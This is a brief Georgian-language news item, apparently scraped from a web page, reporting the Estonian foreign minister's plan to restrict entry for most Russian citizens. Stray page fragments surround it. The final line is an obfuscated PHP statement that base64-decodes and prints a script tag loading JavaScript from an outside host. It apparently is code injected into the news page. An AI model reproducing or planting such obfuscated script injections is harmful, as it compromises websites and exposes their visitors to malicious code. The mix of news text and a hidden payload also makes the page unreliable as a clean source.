celsiusi
ავერსი საქკაბელი
ესტონეთის საგარეო საქმეთა მინისტრის, ურმას რეინსალუს თქმით, რუსეთის მოქალაქეებს ქვეყანაში შესვლას უახლოეს კვირებში შეუზღუდავენ.
 
მისი თქმით, ქვეყანა ცდილობს პროცედურების მიღებას, რის შედეგადაც, რუსეთის მოქალაქეების უმრავლესობა ესტონეთში შესვლას ვეღარ შეძლებს. თუმცა, ამას გარკვეული დრო სჭირდება.​​ რეინსალუს თქმით, სწორედ დრო ასრულებს მნიშვნელოვან როლს, იმ გარემოების გათვალისწინებით, თუ რა რაოდენობის რუსეთის მოქალაქეები შედიან ესტონეთში.
 
როგორც მინისტრი განმარტავს, ბოლო ექვს თვეში ქვეყანაში, რომლის მოსახლეობაც 1.3 მილიონს შეადგენს, რუსეთის 300 000 მოქალაქე შევიდა.
500
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");